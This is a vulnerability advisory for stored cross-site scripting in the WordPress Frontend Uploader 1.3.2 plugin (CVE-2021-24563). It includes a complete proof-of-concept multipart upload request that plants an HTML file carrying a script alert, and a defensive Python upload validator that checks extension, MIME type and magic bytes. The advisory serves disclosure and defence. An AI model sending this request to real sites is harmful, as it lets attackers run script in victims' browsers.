WordPress Frontend Uploader 1.3.2 Cross Site Scripting

2022.01.13
Risk: Low
Local: No
Remote: Yes


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

# Exploit Title: WordPress Plugin Frontend Uploader 1.3.2 - Stored Cross Site Scripting (XSS) (Unauthenticated)
# Date: 10/01/2022
# Exploit Author: Veshraj Ghimire
# Vendor Homepage: https://wordpress.org/plugins/frontend-uploader/
# Software Link: https://plugins.trac.wordpress.org/browser/frontend-uploader/
# Version: 1.3.2
# Tested on: Windows 10 - Chrome, WordPress 5.8.2
# CVE : CVE-2021-24563
# References:
#   https://www.youtube.com/watch?v=lfrLoHl4-Zs
#   https://wpscan.com/vulnerability/e53ef41e-a176-4d00-916a-3a03835370f1

# Description:
# The plugin does not prevent HTML files from being uploaded via its form. An unauthenticated
# user can therefore upload a malicious HTML file (containing JavaScript, for example), which
# is executed when someone accesses the uploaded file directly.

# Proof Of Concept:

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------124662954015823207281179831654
Content-Length: 1396
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="post_ID"

1247
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="post_title"

test
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="post_content"

test
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="files[]"; filename="xss.html"
Content-Type: text/html

<script>alert(/XSS/)</script>
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="action"

upload_ugc
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="form_layout"

image
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="fu_nonce"

021fb612f9
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="_wp_http_referer"

/wordpress/frontend-uploader-form/
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="ff"

92b6cbfa6120e13ff1654e28cef2a271
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="form_post_id"

1247
-----------------------------124662954015823207281179831654--

Then access the uploaded file to trigger the XSS, e.g. https://example.com/wp-content/uploads/2021/07/xss.html
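The root cause described above is a missing upload type check: the form accepted a part named files[] with filename xss.html and Content-Type text/html. The following is an added example (not code from the Frontend Uploader plugin or from the advisory author) of the allow-list check a front-end upload handler should apply before storing anything under wp-content/uploads. It parses a raw multipart/form-data body and rejects any file part whose extension, declared MIME type and leading bytes do not all agree on an allowed image type. The sample body is constructed from the proof of concept above; the boundary string is the advisory's, the form fields and the extra PNG parts are assumptions added to show accepted and rejected cases side by side. In a WordPress plugin the same logic would sit in a wp_handle_upload_prefilter filter.

```python
import re

# Allowed upload types: extension -> (accepted declared MIME types, magic-byte prefixes).
# Anything not in this table (html, svg, php, ...) is refused outright.
ALLOWED = {
    "png":  ({"image/png"},  (b"\x89PNG\r\n\x1a\n",)),
    "jpg":  ({"image/jpeg"}, (b"\xff\xd8\xff",)),
    "jpeg": ({"image/jpeg"}, (b"\xff\xd8\xff",)),
    "gif":  ({"image/gif"},  (b"GIF87a", b"GIF89a")),
}


def parse_multipart(body: bytes, boundary: str):
    """Split a multipart/form-data body into (name, filename, content_type, data) tuples."""
    delim = b"--" + boundary.encode()
    parts = []
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):           # closing delimiter "--boundary--"
            break
        if chunk.startswith(b"\r\n"):         # CRLF that follows the delimiter line
            chunk = chunk[2:]
        head, _, data = chunk.partition(b"\r\n\r\n")
        if data.endswith(b"\r\n"):            # CRLF that precedes the next delimiter
            data = data[:-2]
        headers = head.decode("latin-1")
        name = re.search(r'(?<!file)name="([^"]*)"', headers)
        fname = re.search(r'filename="([^"]*)"', headers)
        ctype = re.search(r"^content-type:\s*([^\r\n;]+)", headers, re.I | re.M)
        parts.append((
            name.group(1) if name else "",
            fname.group(1) if fname else None,
            ctype.group(1).strip().lower() if ctype else None,
            data,
        ))
    return parts


def check_upload(filename: str, content_type, data: bytes):
    """Return (ok, reason). The final extension selects the expected type; the declared
    MIME type and the file's leading bytes must both match it, so a renamed HTML file
    (fake.png) fails even though its extension is on the allow-list."""
    base = filename.rsplit("/", 1)[-1].rsplit("\\", 1)[-1]   # drop any path components
    if "." not in base:
        return False, "no extension"
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED:
        return False, f"extension .{ext} not allowed"
    mimes, magics = ALLOWED[ext]
    if content_type not in mimes:
        return False, f"declared type {content_type} does not match .{ext}"
    if not any(data.startswith(m) for m in magics):
        return False, "content does not look like the declared image type"
    return True, "ok"


def validate_request(body: bytes, boundary: str):
    """Run every file part of a form submission through check_upload."""
    return [(fname, *check_upload(fname, ctype, data))
            for _, fname, ctype, data in parse_multipart(body, boundary)
            if fname is not None]


# Constructed sample body: the advisory's boundary, one HTML part as in the PoC,
# a genuine PNG, and an HTML file renamed to .png (all sample content, not real uploads).
BOUNDARY = "---------------------------124662954015823207281179831654"


def _part(name: str, data: bytes, filename=None, ctype=None) -> bytes:
    disp = f'form-data; name="{name}"' + (f'; filename="{filename}"' if filename else "")
    head = f"Content-Disposition: {disp}\r\n" + (f"Content-Type: {ctype}\r\n" if ctype else "")
    return f"--{BOUNDARY}\r\n{head}\r\n".encode() + data + b"\r\n"


SAMPLE_BODY = (
    _part("post_title", b"test")
    + _part("files[]", b"<script>alert(/XSS/)</script>", "xss.html", "text/html")
    + _part("files[]", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16, "photo.png", "image/png")
    + _part("files[]", b"<html></html>", "fake.png", "image/png")
    + _part("action", b"upload_ugc")
    + f"--{BOUNDARY}--\r\n".encode()
)

if __name__ == "__main__":
    for fname, ok, reason in validate_request(SAMPLE_BODY, BOUNDARY):
        print(f"{fname:12} {'ACCEPT' if ok else 'REJECT'}  {reason}")
```

The magic-byte check is what turns an extension allow-list into a real content check: the PoC file is refused by its .html extension alone, but the same HTML renamed to fake.png passes the extension and MIME tests and is only caught because its first bytes are not a PNG signature. Serving the uploads directory with a Content-Type derived from the stored file (and X-Content-Type-Options: nosniff) is the complementary server-side control, so that even a file that slips through is never rendered as a document.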


Copyright 2024, cxsecurity.com